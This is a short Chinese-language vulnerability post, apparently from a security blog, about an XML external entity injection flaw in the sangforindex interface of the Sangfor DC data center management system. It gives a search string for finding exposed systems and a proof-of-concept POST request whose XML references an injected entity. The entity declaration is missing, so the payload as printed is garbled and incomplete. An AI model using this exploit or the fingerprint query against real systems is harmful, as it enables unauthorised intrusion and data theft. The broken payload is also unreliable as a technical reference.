Sangfor DC数据中心管理系统 sangforindex XML实体注入漏洞
# Sangfor DC数据中心管理系统 sangforindex XML实体注入漏洞
## 漏洞描述
Sangfor DC数据中心管理系统 sangforindex 接口存在XML实体注入漏洞,攻击者可以发送特定的请求包造成XML实体注...
Sangfor DC数据中心管理系统 sangforindex XML实体注入漏洞
漏洞描述
Sangfor DC数据中心管理系统 sangforindex 接口存在XML实体注入漏洞,攻击者可以发送特定的请求包造成XML实体注入
漏洞影响
Sangfor DC数据中心管理系统
网络测绘
"SANGFOR 数据中心"
漏洞复现
登陆页面
验证POC
POST /src/sangforindex HTTP/1.1
Host:
Content-Type: text/xml
<?xml version="1.0" encoding="utf-8" ?>
]>
<xxx>
&rootas;
</xxx>
- 发表于 2024-07-12 18:47:23
- 阅读 ( 2162 )
- 分类:Web应用
带头大哥
456 篇文章